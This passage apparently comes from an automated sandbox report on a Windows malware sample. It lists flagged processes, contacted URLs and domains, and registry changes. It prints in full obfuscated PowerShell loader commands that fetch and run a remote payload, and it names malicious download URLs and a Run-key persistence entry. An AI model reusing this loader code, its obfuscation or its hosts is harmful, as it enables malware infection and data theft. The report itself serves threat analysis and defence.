Un,eaA.rodbSpirieLinjelMallesMu kh ');$Weazand=Thysanoura 'BarsvDFuldkiAggras ,odspKinoteMa tin ConcsAar.maFooletChooki Cario.elefnPa zosBrugesStrggaBesidgBegiv.Ne,hrDFlintoIndtewBlaman,nreclAnoukoHar,oaV.scodTraadFHyg.eiR.sullAutomeOp.po(Forse$Dros J arkre adoplEkskolMorakaEgiskbKonve,U,trd$ Ke nDTor.he RavafFasc.l taxaoUntrorChoosa grontBo,hri.armaoAntemnVaseleBainirBenn n,umboeI,dtas U,ch)Paral ';$Weazand=$Intermodillion[1]+$Weazand;$Deflorationernes=$Intermodillion[0];Dryptrrendes (Thysanoura 'inebr$Respig MalilGynanoturnibProteaLegiol Skob:Reto,QNon.uu subjiApokrn GenbiDeuten OperiM pusa Biksz VelaaSyndet skreiSm,shobaandnNonac=Tolun( BrusTN,daneF.tilsLith,t.emie-MinutPNormaa PendtSlegfhLogik Servi$HomesDSelvoeXxivgfDjelllTnkeeo unkmrU,uguaWi,umtAvicuisubtioHundrnWe,rdeVanilrstuddnfalsle KongsMyoma)Compa ');while (!$Quininiazation) {Dryptrrendes (Thysanoura 'Tra,s$MerkagAngurlSoloeoFyrrebDrawsa kovsl unbi:Se,ipISyntarSjaskrNec,se Sowactaranopr cavPeddie LuntrDisheaUntrabDemoplAimykyBegy.=Excre$Ars ntNedefrDe.oyuastroeNowed ') ;Dryptrrendes $Weazand;Dryptrrendes (Thysanoura 'epicaSF,rretknoglata.esrExt.at expo-UmaalSDatovlFelo.eBudcyeClysipunder D rat4 Vafl ');Dryptrrendes (Thysanoura 'Gnomo$Wil agsaarrlMaj.eoHilstbRefreaAbililPrie.:FluorQAflbsuOutspiSubern HairiSerpunSkabiiB indaInd.rzke seaBodywt Thr.i E,bloPromonDelta=Fornr( edniTFroideUdstesArgumtState-DeligPZorriaS.beltMystahFugle ,epe$SveskDJordveOpskrf PhonlAfs.io TallrHjd,paBog et Uviti Han,oBasunnBlgefe uldpr D,snnPriseeBispis tils)Trans ') ;Dryptrrendes (Thysanoura 'Stoch$ Es ig.potrlAfkrfo vrghb CircaNonmalrustr:Rehy,GSatelrSteynuAnethnGibledPassaeMeteosTilba=Volum$Rowd,gViololForuro DionbscripaMacarlA.vok: godvBTouchaTillgrTheosc KnudhOve saLektrnFremmsLider+Spaer+Multi% Ordd$ Ira.OlsefrmP,ppesstropk LunerSociaiVinlav Bedve Bedsn Maand.etroeAutobsmonda. Overc,polooVi.enuEmneanI spit Calo ') ;$Jellab=$Omskrivendes[$Grundes];}Dryptrrendes (Thysanoura ' N ns$DisksgPneuml Perto ebrbSubscaStedmlAfste:KjrulABaitryS,ykkalollatR.lleoRestllMledel Fixiar.llihS.utcsCrook S,ute=Radio AfskrGSproge FribtConfa-ResweCtestio minin,ermet overe.econn ennatAvant Form$MountDOffenePriz.fGoodolPa.tro urtr Strma Perpt Selmi trinoejersn RicieErythrGrylinSyllae atrsB,vge ');Dryptrrendes (Thysanoura ' Beru$.tromg lik lBivero BewabAnsttaTeminlTwang:CerinFVu,gao S.dilOmophk ProgeVirkevIk,ndo lgedgUnpern tevs Formb SwiduOplftsFortrsAnthreUnma.rParalnBlkkeeTri e Bals=Paten Rest[ConsaSWhit y.ortusAborttPo yseFlik.m anne..rdseCSpndsoAuntlnAttenvnesioeGlamorSclert Adul] boue:Tilba:EntusFM csbr ,rbeoKvindmUegenBHoveda olups MeekeGrisk6Nonpl4,ystsSUpk itInarmr.denoiQuadrnoligogtra e(La,en$F,rmoABerriy UnsuaKar.kt GateoSlipslSpionlOverdaSmkk,h Ta bsMinet)Linie ');Dryptrrendes (Thysanoura ' Modu$HumrsgSen.ulBikseoud anbM sliaSidevldisse:D,edeHSouksoBefaml klunkFjor Indiv=Klebi Overd[MeddlSRapuny C stsTimeotFips,eU,sulmRente.viserT BiogeIrr,txBataltDivas.HaverERodomn ModecRetskoDessed Bil iA.ipon subsgIntra]Rling:acidb: BltmAPe,itStemp,Cfine,IS,utbICheck.RanchGUnculeAffortSt,msSTetart LivsrIndkai,rypsnFattigNitte( Mont$ T.ovFMyriaoForhal.npopkuansteAntikv Fo.loB.sesg NondnSensisA sesbFasteukrigssFarfesUndereHornbrGruf nMincieKorse)Kume ');Dryptrrendes (Thysanoura 'Holdk$UnkirgContolGodchoHjlpeb ImdeaOmnivl Unqu:MgtigC TufaoF rprxPrincpHeartoUngelmVildtoCand.nChi oaMakk,eGrusnr egi= Coa,$FljteHTa.zaoi flal,romokEnor .Hostes.taleuHoropb AgglsAfskrtTatovrKeybdiBlde,n rjudgSkrif(Forby2Medi.9 Over2Twe t2Blokd1.rugs4Reg o,Nonco2grsen8W ith5 Medf2Forb.4De,ol) Drgg ');Dryptrrendes $Coxpomonaer;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
malicious
C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe
"C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalfore.iSkoseeGangsnR.vistGlutt ');Dryptrrendes (Thysanoura 'Besrg$ UnbeDUltraiLinj,sKontapKundeeGunwanNarr,s UndraEmbedt colei MaksoKo.uan airs .ivssHonoraFixergSnipp.Paal.HGejsteA dicaGyng.dS iliee.mqurLejevsMasse[rebri$InconE ProtpMissii SmedpBeskuhArgusyGtvrklTsadel,tesk] S,ol=Flor.$ GaleHArga jPapirlParodpSkif,eAlkohv ashiaCombrrRiveri Un,eaA.rodbSpirieLinjelMallesMu kh ');$Weazand=Thysanoura 'BarsvDFuldkiAggras ,odspKinoteMa tin ConcsAar.maFooletChooki Cario.elefnPa zosBrugesStrggaBesidgBegiv.Ne,hrDFlintoIndtewBlaman,nreclAnoukoHar,oaV.scodTraadFHyg.eiR.sullAutomeOp.po(Forse$Dros J arkre adoplEkskolMorakaEgiskbKonve,U,trd$ Ke nDTor.he RavafFasc.l taxaoUntrorChoosa grontBo,hri.armaoAntemnVaseleBainirBenn n,umboeI,dtas U,ch)Paral ';$Weazand=$Intermodillion[1]+$Weazand;$Deflorationernes=$Intermodillion[0];Dryptrrendes (Thysanoura 'inebr$Respig MalilGynanoturnibProteaLegiol Skob:Reto,QNon.uu subjiApokrn GenbiDeuten OperiM pusa Biksz VelaaSyndet skreiSm,shobaandnNonac=Tolun( BrusTN,daneF.tilsLith,t.emie-MinutPNormaa PendtSlegfhLogik Servi$HomesDSelvoeXxivgfDjelllTnkeeo unkmrU,uguaWi,umtAvicuisubtioHundrnWe,rdeVanilrstuddnfalsle KongsMyoma)Compa ');while (!$Quininiazation) {Dryptrrendes (Thysanoura 'Tra,s$MerkagAngurlSoloeoFyrrebDrawsa kovsl unbi:Se,ipISyntarSjaskrNec,se Sowactaranopr cavPeddie LuntrDisheaUntrabDemoplAimykyBegy.=Excre$Ars ntNedefrDe.oyuastroeNowed ') ;Dryptrrendes $Weazand;Dryptrrendes (Thysanoura 'epicaSF,rretknoglata.esrExt.at expo-UmaalSDatovlFelo.eBudcyeClysipunder D rat4 Vafl ');Dryptrrendes (Thysanoura 'Gnomo$Wil agsaarrlMaj.eoHilstbRefreaAbililPrie.:FluorQAflbsuOutspiSubern HairiSerpunSkabiiB indaInd.rzke seaBodywt Thr.i E,bloPromonDelta=Fornr( edniTFroideUdstesArgumtState-DeligPZorriaS.beltMystahFugle ,epe$SveskDJordveOpskrf PhonlAfs.io TallrHjd,paBog et Uviti Han,oBasunnBlgefe uldpr D,snnPriseeBispis tils)Trans ') ;Dryptrrendes (Thysanoura 'Stoch$ Es ig.potrlAfkrfo vrghb CircaNonmalrustr:Rehy,GSatelrSteynuAnethnGibledPassaeMeteosTilba=Volum$Rowd,gViololForuro DionbscripaMacarlA.vok: godvBTouchaTillgrTheosc KnudhOve saLektrnFremmsLider+Spaer+Multi% Ordd$ Ira.OlsefrmP,ppesstropk LunerSociaiVinlav Bedve Bedsn Maand.etroeAutobsmonda. Overc,polooVi.enuEmneanI spit Calo ') ;$Jellab=$Omskrivendes[$Grundes];}Dryptrrendes (Thysanoura ' N ns$DisksgPneuml Perto ebrbSubscaStedmlAfste:KjrulABaitryS,ykkalollatR.lleoRestllMledel Fixiar.llihS.utcsCrook S,ute=Radio AfskrGSproge FribtConfa-ResweCtestio minin,ermet overe.econn ennatAvant Form$MountDOffenePriz.fGoodolPa.tro urtr Strma Perpt Selmi trinoejersn RicieErythrGrylinSyllae atrsB,vge ');Dryptrrendes (Thysanoura ' Beru$.tromg lik lBivero BewabAnsttaTeminlTwang:CerinFVu,gao S.dilOmophk ProgeVirkevIk,ndo lgedgUnpern tevs Formb SwiduOplftsFortrsAnthreUnma.rParalnBlkkeeTri e Bals=Paten Rest[ConsaSWhit y.ortusAborttPo yseFlik.m anne..rdseCSpndsoAuntlnAttenvnesioeGlamorSclert Adul] boue:Tilba:EntusFM csbr ,rbeoKvindmUegenBHoveda olups MeekeGrisk6Nonpl4,ystsSUpk itInarmr.denoiQuadrnoligogtra e(La,en$F,rmoABerriy UnsuaKar.kt GateoSlipslSpionlOverdaSmkk,h Ta bsMinet)Linie ');Dryptrrendes (Thysanoura ' Modu$HumrsgSen.ulBikseoud anbM sliaSidevldisse:D,edeHSouksoBefaml klunkFjor Indiv=Klebi Overd[MeddlSRapuny C stsTimeotFips,eU,sulmRente.viserT BiogeIrr,txBataltDivas.HaverERodomn ModecRetskoDessed Bil iA.ipon subsgIntra]Rling:acidb: BltmAPe,itStemp,Cfine,IS,utbICheck.RanchGUnculeAffortSt,msSTetart LivsrIndkai,rypsnFattigNitte( Mont$ T.ovFMyriaoForhal.npopkuansteAntikv Fo.loB.sesg NondnSensisA sesbFasteukrigssFarfesUndereHornbrGruf nMincieKorse)Kume ');Dryptrrendes (Thysanoura 'Holdk$UnkirgContolGodchoHjlpeb ImdeaOmnivl Unqu:MgtigC TufaoF rprxPrincpHeartoUngelmVildtoCand.nChi oaMakk,eGrusnr egi= Coa,$FljteHTa.zaoi flal,romokEnor .Hostes.taleuHoropb AgglsAfskrtTatovrKeybdiBlde,n rjudgSkrif(Forby2Medi.9 Over2Twe t2Blokd1.rugs4Reg o,Nonco2grsen8W ith5 Medf2Forb.4De,ol) Drgg ');Dryptrrendes $Coxpomonaer;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe
"C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://covid19help.top/Transfusionist.vbs
172.67.175.222
malicious
https://api.ipify.org/
104.26.12.205
https://covid19help.top/Transfusionist.vbsj
unknown
http://nuget.org/NuGet.exe
unknown
http://mail.myhydropowered.com
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://covid19help.top/ch
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://covid19help.top/Transfusionist.vbsssC:
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://drive.usercontent.google.com/
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://go.micros
unknown
http://r3.i.lencr.org/0
unknown
https://www.google.com
unknown
https://api.ipify.org
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://r3.o.lencr.org0
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://apis.google.com
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://covid19help.top/
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
covid19help.top
172.67.175.222
malicious
x1.i.lencr.org
unknown
malicious
mail.myhydropowered.com
131.226.2.60
drive.google.com
172.217.215.138
drive.usercontent.google.com
108.177.122.132
api.ipify.org
104.26.12.205
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
172.67.175.222
covid19help.top
United States
malicious
208.95.112.1
ip-api.com
United States
172.217.215.102
unknown
United States
104.26.12.205
api.ipify.org
United States
172.217.215.138
drive.google.com
United States
108.177.122.132
drive.usercontent.google.com
United States
131.226.2.60
mail.myhydropowered.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
FTSKIaM
malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Startup key
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
5m.
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
}n.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
"p.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\27D5A
27D5A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
